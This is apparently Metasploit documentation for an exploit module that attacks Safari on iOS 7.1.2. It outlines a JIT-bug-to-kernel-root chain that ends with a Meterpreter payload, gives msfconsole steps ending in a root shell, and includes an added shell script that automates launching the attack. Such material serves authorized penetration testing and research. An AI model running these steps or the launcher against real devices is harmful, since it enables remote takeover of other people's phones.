Path: blob/master/documentation/modules/exploit/apple_ios/browser/safari_jit.md
## Vulnerable Application

This module exploits a JIT optimization bug in Safari's WebKit engine. The bug lets the module write shellcode into an RWX memory region owned by JavaScriptCore and execute it. The shellcode carries a kernel exploit (CVE-2016-4669) that obtains kernel read/write, escalates to root and disables code signing. Finally, the module downloads and executes the Meterpreter payload.
This module has been tested against iOS 7.1.2 on an iPhone 4.
## Verification Steps

1. Start `msfconsole`
2. Do: `use exploit/apple_ios/browser/safari_jit`
3. Do: `set lhost [ip]`
4. Do: `set srvhost [ip]`
5. Do: `run`
6. Browse to the website with a vulnerable device
7. You should get a root shell.
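The steps above can be scripted so the listener and server addresses are supplied once and the whole sequence runs non-interactively. The following is an added example, not part of the module or its documentation: a POSIX shell function that emits a Metasploit resource script for the steps listed, and a launcher that feeds it to `msfconsole -r`. The option names `LHOST`, `SRVHOST` and `DEBUG_EXPLOIT` come from this page; the `-q` and `-r` flags are standard `msfconsole` flags (quiet start, run resource script).

```shell
#!/bin/sh
# Added example (not the module's own code): generate a Metasploit resource
# script reproducing the verification steps, then launch msfconsole with it.

# Print the resource-script text for the given listener/server IPs.
# Usage: safari_jit_rc LHOST SRVHOST [DEBUG_EXPLOIT]
safari_jit_rc() {
    lhost="$1"
    srvhost="$2"
    debug="${3:-false}"          # DEBUG_EXPLOIT defaults to false, as on the page
    case "$lhost:$srvhost" in
        *:|:*)                   # either address missing: refuse to emit a script
            echo "usage: safari_jit_rc LHOST SRVHOST [true|false]" >&2
            return 1 ;;
    esac
    printf '%s\n' \
        "use exploit/apple_ios/browser/safari_jit" \
        "set LHOST $lhost" \
        "set SRVHOST $srvhost" \
        "set DEBUG_EXPLOIT $debug" \
        "run"
}

# Write the script to a temporary file and start msfconsole with it
# (-q: no banner, -r: execute the resource script). Only runs when the
# script is invoked as: ./safari_jit.sh --launch LHOST SRVHOST [true|false]
if [ "${1:-}" = "--launch" ]; then
    shift
    rc="$(mktemp)" || exit 1
    safari_jit_rc "$@" > "$rc" || exit 1
    msfconsole -q -r "$rc"
fi
```

Once `msfconsole` reports the server URL, browse to it from the vulnerable device as in step 6; with `DEBUG_EXPLOIT true` the device's syslog will additionally show the exploitation and payload-loading entries described under Options.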
## Options

**DEBUG_EXPLOIT**

Show debug information during exploitation. This adds entries to the iPhone syslog related to exploitation and loading of the payload. Defaults to `false`.